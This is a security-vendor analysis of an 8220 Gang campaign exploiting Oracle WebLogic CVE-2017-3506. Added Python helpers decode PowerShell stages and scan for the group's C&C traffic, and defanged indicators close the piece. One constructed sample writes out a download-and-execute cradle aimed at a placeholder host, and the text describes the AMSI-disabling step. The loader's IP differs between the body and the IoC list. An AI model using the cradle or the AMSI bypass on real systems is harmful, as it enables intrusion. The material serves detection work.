We observed the threat actor group known as “8220 Gang” employing new strategies for their respective campaigns, including exploits for the Linux utility “lwp-download” and CVE-2017-3506, an Oracle WebLogic vulnerability.
Update as of 7/25/2023 3:40PM PHT: Updated the indicators of compromise.
8220 Gang (also known as “8220 Mining Group,” a name derived from its use of port 8220 for command-and-control or C&C communications) has been active since 2017 and continues to scan for vulnerable applications in cloud and container environments. Researchers have documented this group exploiting Oracle WebLogic, Apache Log4j, and Atlassian Confluence vulnerabilities, as well as misconfigured Docker containers, to deploy cryptocurrency miners on both Linux and Microsoft Windows hosts. The group has been documented using Tsunami malware, the XMRIG cryptominer, masscan, and spirit, among other tools, in its campaigns.
Looking at other researchers’ documentation of the gang’s recent activities, the threat actor appears to have remained active in recent months. This article explores a recent attack, captured by one of our honeypots, that exploited the Oracle WebLogic vulnerability CVE-2017-3506. This vulnerability, with a CVSS score of 7.4, affects the WLS Security Component of Oracle WebLogic; when exploited, it lets attackers remotely execute arbitrary commands through an HTTP request carrying a specially crafted XML document. This allows attackers to gain unauthorized access to sensitive data or compromise the entire system.
Entry point
Attackers exploited the HTTP URI (Uniform Resource Identifier) “wls-wsat/CoordinatorPortType” as an entry point to target an Oracle WebLogic server leveraging the CVE-2017-3506 vulnerability.
On entry, 8220 Gang delivered a PowerShell script that downloads and creates other dropper files, using the six-year-old vulnerability. In recent attacks, we also observed the group using “lwp-download,” a Linux utility that downloads the file at a given URL. In this entry, we detail another routine targeting Windows systems.
Infection routine
The attack payload executes a Base64-encoded PowerShell command. Once decoded, the command opens a hidden PowerShell window (-NonI -W Hidden) with no profile loaded (-NoP) and bypasses the execution policy (-Exec Bypass), then downloads and executes the PowerShell script “bypass.ps1” from http[:]//185[.]17[.]0[.]199/bypass.ps1 without displaying any visible output to the user.
Analysis of bypass.ps1
The PowerShell script decodes multiple Base64-encoded byte arrays to build another obfuscated PowerShell script in memory and executes it using the “iex” (Invoke-Expression) cmdlet.
The variables assigned to byte arrays (in this case, the $c byte array) hold Base64-encoded strings that the script later uses for deobfuscation. Once the $cc variable has been computed, it holds the decoded contents of the $c byte array: a PowerShell script that is executed in memory without ever being written to disk. Decoding the $c bytes as ASCII yields the Base64 string, and decoding that string in turn yields the script stored in $cc, which is then executed.
The new PowerShell script performs the following tasks:
1. It disables AMSI scanning. The code sets the “amsiInitFailed” field of the <System.Management.Automation.AmsiUtils> class to “True,” which unhooks AMSI so that no scanning is performed for the current process. To update the value of “amsiInitFailed,” it uses .NET reflection to assign “True,” as observed in the bypass command.
2. After disabling AMSI, it defines the path under the Windows “temp” directory where the malicious binary file will be written.
3. Next, it writes the binary file to the path specified in the “$eXE_PaTh” variable. This section decodes a Base64 string into a byte array (the binary’s contents) and uses the .NET System.IO class to write the binary file to disk.
4. At the end of the script, it executes the newly written binary file in the Windows “temp” directory with the “-WindowStyle Hidden” parameter, so that no user interface is displayed.
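The following Python is an added example, not code from the original post or from Trend Micro, showing how a defender can work through the two stages just described. The first function recovers the plaintext of a PowerShell -EncodedCommand launch (PowerShell Base64-encodes the UTF-16LE bytes of the command, which is why a plain ASCII decode of the blob looks like garbage) and flags the hidden-window, no-profile and policy-bypass switches and any download cradle; the second checks a captured script block for the four stage-2 behaviours (the AmsiUtils/amsiInitFailed names used for AMSI tampering, a Base64-to-binary write into the temp directory, and a hidden launch). The sample command line and script fragment are constructed, use a placeholder host rather than the page’s IoC, and deliberately leave the reflection call out; the function names are my own.

```python
import base64
import re
from typing import Dict, Optional, Set

# Launcher switches the page reports in the decoded command, and what each does.
SWITCHES = {
    "-noni": "non-interactive",
    "-w hidden": "hidden window",
    "-nop": "no profile",
    "-exec bypass": "execution policy bypass",
}
# Download-and-execute markers expected in a staged loader.
CRADLE = ("downloadstring", "downloadfile", "invoke-expression", "iex ", "iex(")
# -EncodedCommand and the abbreviations powershell.exe accepts, followed by a Base64 blob.
ENC_RE = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\")(]+")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent or malformed.
    PowerShell Base64-encodes the UTF-16LE bytes of the command, not ASCII."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_launch(cmdline: str) -> Dict[str, object]:
    """Flag launcher switches, any download cradle and URLs in a process-creation line."""
    low = cmdline.lower()
    decoded = decode_encoded_command(cmdline) or ""
    return {
        "switches": sorted(name for sw, name in SWITCHES.items() if sw in low),
        "cradle": any(marker in decoded.lower() for marker in CRADLE),
        "urls": URL_RE.findall(decoded),
        "decoded": decoded,
    }


def score_script(text: str) -> Set[str]:
    """Map the stage-2 behaviours the page describes to simple text indicators."""
    low = text.lower()
    hits = set()
    if "amsiutils" in low and "amsiinitfailed" in low:
        hits.add("amsi_tamper")          # reflection against the AMSI init-failed field
    if "frombase64string" in low and "writeallbytes" in low and "temp" in low:
        hits.add("temp_drop")            # Base64 -> bytes -> file in the temp directory
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        hits.add("hidden_launch")        # binary started without a visible window
    return hits


# Constructed samples: the stage-1 cradle uses a placeholder host, not the page's IoC.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/bypass.ps1')"
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell.exe -NonI -W Hidden -NoP -Exec Bypass -enc {ENCODED}"
SAMPLE_SCRIPT = """\
$a = 'System.Management.Automation.AmsiUtils'; $f = 'amsiInitFailed'  # names only; call elided
$eXE_PaTh = "$env:TEMP\\Winscp-setup-1867.exe"
[System.IO.File]::WriteAllBytes($eXE_PaTh, [Convert]::FromBase64String($b))
Start-Process -FilePath $eXE_PaTh -WindowStyle Hidden
"""

if __name__ == "__main__":
    print(analyze_launch(SAMPLE_CMDLINE))
    print(sorted(score_script(SAMPLE_SCRIPT)))
```

Feed `analyze_launch` the command line from a process-creation event (Sysmon event 1 or Windows 4688) and `score_script` the text of a script-block logging event (4104); the two together cover the launch and the in-memory stage the post describes, and the same indicators translate directly into SIEM rules.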
The file “Winscp-setup-1867.exe” is responsible for downloading the file “Ebvjmba.dat” by repeatedly sending GET requests to its server, http[:]//79[.]137[.]203[.]156/Ebvjmba.dat. After Winscp-setup-1867.exe executes, a DLL file contacts the file server at 79[.]137[.]203[.]156, an IP address we determined to be the C&C server, to download the DAT file dropper. The DLL uses the .NET framework’s “HttpClient” class to send an HTTP GET request to the specified asset URL.
This dropper contains only a Base64-encoded string of binary code, stored in reverse to evade detection.
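Added example, not code from the original post: a Python helper for the two decoding layers described above, the byte-array-to-ASCII-to-Base64 step that produces the in-memory script, and the reversed Base64 string carried by the dropper. The sample script and the 16-byte “MZ” stand-in for the dropped binary are constructed; the variable names $c and $cc follow the post, and the function names are assumptions. “In reverse” is ambiguous (the text may be reversed, or the encoded bytes may be), so the dropper helper tries both readings and keeps the one that starts with a PE header.

```python
import base64
import re
from typing import Optional

# `[byte[]]$name = 0x.., 0x.., ...` as it appears in the loader script.
BYTE_ARRAY_RE = re.compile(r"\[byte\[\]\]\s*\$(\w+)\s*=\s*((?:0x[0-9a-fA-F]{2}\s*,?\s*)+)", re.I)


def decode_byte_array_layer(script: str, name: str) -> Optional[str]:
    """Locate the byte array assigned to $name, read its bytes as ASCII text, and
    Base64-decode that text into the next script layer (the $c -> $cc step)."""
    for m in BYTE_ARRAY_RE.finditer(script):
        if m.group(1).lower() != name.lower():
            continue
        raw = bytes(int(h, 16) for h in re.findall(r"0x([0-9a-fA-F]{2})", m.group(2)))
        try:
            return base64.b64decode(raw.decode("ascii"), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def decode_reversed_dropper(blob: str) -> Optional[bytes]:
    """Recover a binary from Base64 stored 'in reverse'. Two readings are tried, since
    either the text or the encoded bytes may have been reversed; the candidate that
    begins with a PE 'MZ' header is returned, else None."""
    candidates = []
    try:
        candidates.append(base64.b64decode(blob[::-1], validate=True))   # text reversed
    except ValueError:
        pass
    try:
        candidates.append(base64.b64decode(blob, validate=True)[::-1])   # bytes reversed
    except ValueError:
        pass
    for data in candidates:
        if data[:2] == b"MZ":
            return data
    return None


def _byte_array_literal(name: str, text: str) -> str:
    """Build the PowerShell literal for a constructed sample: Base64 text as 0x.. bytes."""
    b64 = base64.b64encode(text.encode("utf-8")).decode("ascii")
    return f"[byte[]]${name} = " + ", ".join(f"0x{b:02x}" for b in b64.encode("ascii"))


# Constructed samples (not the real bypass.ps1 or Ebvjmba.dat content).
INNER_SCRIPT = "Write-Output 'stage-2 (constructed)'"
SAMPLE_SCRIPT = _byte_array_literal("c", INNER_SCRIPT) + "\n$cc = [Text.Encoding]::ASCII.GetString($c)\n"
FAKE_PE = b"MZ" + bytes(range(14))                     # 16-byte stand-in for a PE payload
DROPPER_TEXT_REVERSED = base64.b64encode(FAKE_PE).decode("ascii")[::-1]
DROPPER_BYTES_REVERSED = base64.b64encode(FAKE_PE[::-1]).decode("ascii")

if __name__ == "__main__":
    print(decode_byte_array_layer(SAMPLE_SCRIPT, "c"))
    print(decode_reversed_dropper(DROPPER_TEXT_REVERSED)[:2])
```

The padding characters are what make the reversed-text case detectable: a Base64 string that ends in “=” ends up starting with “=” once reversed, so a strict decoder rejects the wrong reading on its own, and the MZ check disambiguates the cases where there is no padding.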
The newly created .dll file is an encrypted resource file that is injected into the MSBuild process. The file is heavily obfuscated, adding an extra layer of complexity for analysts. After inspecting the process’s memory, we found that the configuration of the injected payload is Base64-encoded and that the new process communicates with one of the following three C&Cs over TCP port 9090, 9091, or 9092 to download a cryptocurrency miner:
- 179[.]43[.]155[.]202
- work[.]letmaker[.]top
- su-94[.]letmaker[.]top
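Added example (not code from the original post): a Python pass over constructed, tab-separated flow records that tiers each record against the C&C hosts and TCP ports listed above. A new label under letmaker.top is treated as a host match, and an unlisted host on one of the three ports is reported as a low-confidence signal worth a second look. The record format and the function names are assumptions.

```python
from typing import List, NamedTuple

# Network indicators the page lists for the injected payload's C&C traffic.
CNC_HOSTS = {"179.43.155.202", "work.letmaker.top", "su-94.letmaker.top"}
CNC_PARENT_DOMAINS = {"letmaker.top"}      # any new label under these also counts
CNC_PORTS = {9090, 9091, 9092}


class Hit(NamedTuple):
    uid: str
    reason: str
    confidence: str


def matches_host(host: str) -> bool:
    """True for a listed host, a listed parent domain, or any subdomain of one."""
    h = host.lower().rstrip(".")
    return h in CNC_HOSTS or any(h == d or h.endswith("." + d) for d in CNC_PARENT_DOMAINS)


def scan_flows(lines: List[str]) -> List[Hit]:
    """Tier each flow record: host+port = high, host only = medium, port only = low."""
    hits = []
    for line in lines:
        if not line.strip() or line.startswith("#"):      # skip blanks and header rows
            continue
        _ts, uid, _src, dst, port = line.rstrip("\n").split("\t")
        host_hit, port_hit = matches_host(dst), int(port) in CNC_PORTS
        if host_hit and port_hit:
            hits.append(Hit(uid, f"{dst}:{port} matches a listed C&C host and port", "high"))
        elif host_hit:
            hits.append(Hit(uid, f"{dst} is a listed C&C host", "medium"))
        elif port_hit:
            hits.append(Hit(uid, f"unlisted host {dst} on C&C port {port}", "low"))
    return hits


# Constructed flow records (ts, uid, src, dst, dst_port), not from any real sensor.
SAMPLE_FLOWS = [
    "#fields\tts\tuid\tsrc\tdst\tdst_port",
    "1690000001.1\tC1\t10.0.0.5\t179.43.155.202\t9090",
    "1690000002.2\tC2\t10.0.0.5\tsu-94.letmaker.top\t443",
    "1690000003.3\tC3\t10.0.0.7\tnew-node.letmaker.top\t9092",
    "1690000004.4\tC4\t10.0.0.9\tupdates.example.invalid\t9091",
    "1690000005.5\tC5\t10.0.0.9\tupdates.example.invalid\t443",
]

if __name__ == "__main__":
    for hit in scan_flows(SAMPLE_FLOWS):
        print(hit.confidence, hit.uid, hit.reason)
```

The port-only tier exists because the post notes the group rotates file and C&C servers while keeping older tooling; a fresh server on the same 9090–9092 range is the kind of change a pure indicator match would miss.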
Conclusion
lwp-download is a Linux utility present by default on a number of platforms, so 8220 Gang’s adoption of it as part of a malware routine can affect a number of services, and the technique is likely to be reused. Given the threat actor’s tendency to reuse tools across campaigns and to abuse legitimate tools as part of its arsenal, organizations’ security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility.
Abuse of lwp-download can be expected in the short term for compromising and targeting other platforms. Despite reusing old tools and C&C servers, the gang has started targeting Windows systems and using new file and C&C servers to evade previous detections. Moreover, while it might initially seem counterintuitive to use a six-year-old security gap in an attack, the malicious actor’s scanning activity could have revealed systems still vulnerable to the exploit.
Considering these developments, we consider 8220 Gang a threat to be reckoned with, despite other researchers describing them as “low-level script kiddies,” and organizations still have work to do in keeping their security systems up to date. In the group’s previous deployments, the scripts it used were simple, unable to evade detection, and easy to analyze. Over time, the group has included significantly damaging pieces of malware (such as Tsunami) in its campaigns. We will continue monitoring this group and its deployments for analysis, detection, and blocking.
Trend Micro solutions
Trend Cloud One™ – Endpoint Security and Workload Security protect endpoints, servers, and cloud workloads through unified visibility, management, and role-based access control. These services provide specialized security optimized for your diverse endpoint and cloud environments, which eliminate the cost and complexity of multiple point solutions.
Indicators of Compromise (IOCs)
SHA256 | File name/Description | Detection |
---|---|---|
b5fa13d8a03e9a38995e1a087f873e9f2e5d53d8ac713ffb951f62084c810a90 | bypass.ps1 | Trojan.MSIL.DROPPER.BS |
URLs and IPs
- http[:]//79[.]137[.]203[.]156/Ebvjmba.dat
- http[:]//185[.]17[.]0[.]19/bypass.ps1
- http[:]//185[.]17[.]0[.]19/Nmfwg.png
- 185[.]17[.]0[.]19
- 194[.]38[.]23[.]170
- 201[.]71[.]165[.]153
- 179[.]43[.]155[.]202
- Work[.]letmaker[.]top
- su-94[.]letmaker[.]top
MITRE ATT&CK
Source: https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html